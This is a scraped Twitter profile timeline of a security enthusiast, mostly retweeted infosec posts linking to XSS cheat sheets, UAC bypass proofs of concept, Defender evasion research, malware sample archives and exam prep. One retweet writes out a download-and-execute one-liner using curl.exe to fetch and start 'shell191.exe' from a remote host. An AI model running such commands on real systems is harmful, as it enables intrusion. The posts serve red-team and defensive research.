|
b00n
@
b00n10
|
|
it took me 3 days in total and 32 reinstalls
|
|
|
125
Tweetovi
|
149
Pratim
|
22
Osobe koje vas prate
|
| Tweetovi |
| b00n proslijedio/la je tweet | ||
|
Xentropy
@SamuelAnttila
|
1. velj |
|
I was tired of outdated XSS cheat sheets that don't touch on frameworks, html5, filter bypasses and other important stuff, so I made my own. I hope you find it as useful as I do. :)
netsec.expert/2020/02/01/xss…
#bugbountytips pic.twitter.com/Mdygq1PI9Z
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
Reegun
@reegun21
|
28. sij |
|
#Curl.exe is the new #rundll32.exe - #LOLbin
Affected systems - Windows 10 build 17063 and Later
curl -O http://192.168.191.1/shell191.exe & start shell191.exe
More info - medium.com/@reegun/curl-e…
youtu.be/f2xpCl2Y7t8
#blueteam #redteam #dfir #ThreatHunting
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
Dino A. Dai Zovi
@dinodaizovi
|
26. sij |
|
The claim in the FTI forensics report on Bezos’ iPhone that, “due to end-to-end encryption employed by WhatsApp, it is virtually impossible to decrypt the contents of the downloader [.enc file]...” bugged me so much that I coded up how to do it:
github.com/ddz/whatsapp-m…
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
vx-underground
@vxunderground
|
21. sij |
|
Friends,
It has come to our attention a company is selling our malware samples. VXUG will never charge for it's data. Our current collection boasts a healthy 443,703 samples. New blocks of 20,000 added weekly. Free of charge. No IP logs. No cookies.
vxug.fakedoma.in/packs.html pic.twitter.com/R2MlrsMfS4
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
Kevin Beaumont
@GossiTheDog
|
16. sij |
|
There's a website for testing the NSA crypto thing, if you can open it without certificate warnings you may want to apply January 2020's Windows patches. Note this is difficult to scale for MITM interception due to number of systems it doesn't work on. chainoffools.wouaib.ch twitter.com/GossiTheDog/st…
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
Kevin Beaumont
@GossiTheDog
|
9. sij |
|
Some of the biggest and most costly breaches in recent memory caused by 20 year old security bugs in security products by security vendors:
- Fortigate SSL VPN.
- Citrix ADC (SSL VPN).
- Pulse Secure (SSL VPN).
In each case they all lacked basic security mitigations.
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
Pixis
@HackAndDo
|
28. pro |
|
New article about "Pass the hash"
This technique is used in a lot of engagements, and yet it is not always fully understood. This is a little review of one of the most popular lateral movement techniques 🙃
en.hackndo.com/pass-the-hash/
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
Captain Banana 🌱
@CaptnBanana
|
1. sij |
|
New year, new @radareorg merch - shipped with every radare2 pro license. Be like @trufae and get yours now! pic.twitter.com/o7u514JrOq
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
Carroll
@n0x00
|
30. pro |
|
look at that Seniority level:
#redteam pic.twitter.com/0OpQQTLZtn
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
vx-underground
@vxunderground
|
27. pro |
|
Friends,
In the past 30 days we have:
-Consumed just over 3TBs of web traffic
-Ducked 3 DDoS attacks
-Gotten over 600 new followers
-Added approx. 20,000 malware samples
-4 Papers
-1 full ezine
-Made 'impressions' on over 251,000 people
-Grown
2020 will be a good year for VX.
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
PortSwigger Research
@PortSwiggerRes
|
9. pro |
|
Breaking the chains on HTTP Request Smuggler, by @albinowax
portswigger.net/research/break…
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
sailay(valen)
@404death
|
8. pro |
|
you can UAC bypass all executable files which are autoelevate true base on my first article.
UAC Bypass All the things POCs:
github.com/sailay1996/UAC…
sample:
Bluetooth uninstall device task (UAC Bypass to administrator) pic.twitter.com/TawDPFRvLc
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
b4rtik
@b4rtik
|
2. pro |
|
A little research from @matteomalvica and me on how to evade WinDefender ATP credential-theft
matteomalvica.com/blog/2019/12/0…
|
||
|
|
||
|
b00n
@b00n10
|
3. pro |
|
@culturedphish thx for the great training!
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
grant
@TakeForGrantd
|
30. stu |
|
Spotify: hey dumbass. hey asshole.
Me: pls don’t
Spotify: here’s your 2019 Rewind playlist you bitch
Me: stop
Spotify: and we pulled every fucken song from that one 6 week period after a breakup
Me: *already listening to the playlist, crying* it’s perfect. i hate you.
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
Somdev Sangwan
@s0md3v
|
28. stu |
|
Check if a server is running any vulnerable services
wget https://raw.githubusercontent(.)com/vulnersCom/nmap-vulners/master/vulners.nse -O /usr/share/nmap/scripts/vulners.nse && nmap --script-updatedb
All done, now you can do a scan with
nmap -sV --script vulners <target> pic.twitter.com/sOTHb0Y6Ln
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
A hacker's life
@Unknownuser1806
|
26. stu |
|
Here some RCE reports You should read
hackerone.com/reports/591295
hackerone.com/reports/296991
hackerone.com/reports/470637
hackerone.com/reports/430463
hackerone.com/reports/502758
hackerone.com/reports/423541
hackerone.com/reports/510887
hackerone.com/reports/538771
hackerone.com/reports/460545
#bugbounty #bugbountytips
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
Nir Yehoshua
@NirYeho
|
25. stu |
|
Want to classify process injection by Windows API calls? Check out the new poster made by @MalFuzzer and me!
#ProcessInjection #MalwareAnalysis #CheatSheet #Poster
malwareanalysis.co pic.twitter.com/uLN81TUCBd
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
𝐂𝐮𝐫𝐭𝐢𝐬 𝐁𝐫𝐚𝐳𝐳𝐞𝐥𝐥
@CurtBraz
|
19. stu |
|
Well, since @Microsoft didn't find my bug report to be worth rewarding or fixing anytime soon, I figured I'd drop the blog. Hoping Red Teams can enjoy using this technique to bypass Protected View in Office documents! 📄🎣
#BugBounty #RedTeam #Hacking
medium.com/@curtbraz/gett…
|
||
|
|
||
| b00n proslijedio/la je tweet | ||
|
Emad Shanab
@Alra3ees
|
4. stu |
|
OSWE Preparation resources:-
CC @inishantsinha Good luck for your exam.
github.com/timip/OSWE
github.com/wetw0rk/AWAE-P…
github.com/sailay1996/off…
github.com/M507/AWAE-Prep…
hansesecure.de/2019/08/from-a…
github.com/ManhNho/AWAE-O… pic.twitter.com/yt5jpdDxVL
|
||
|
|
||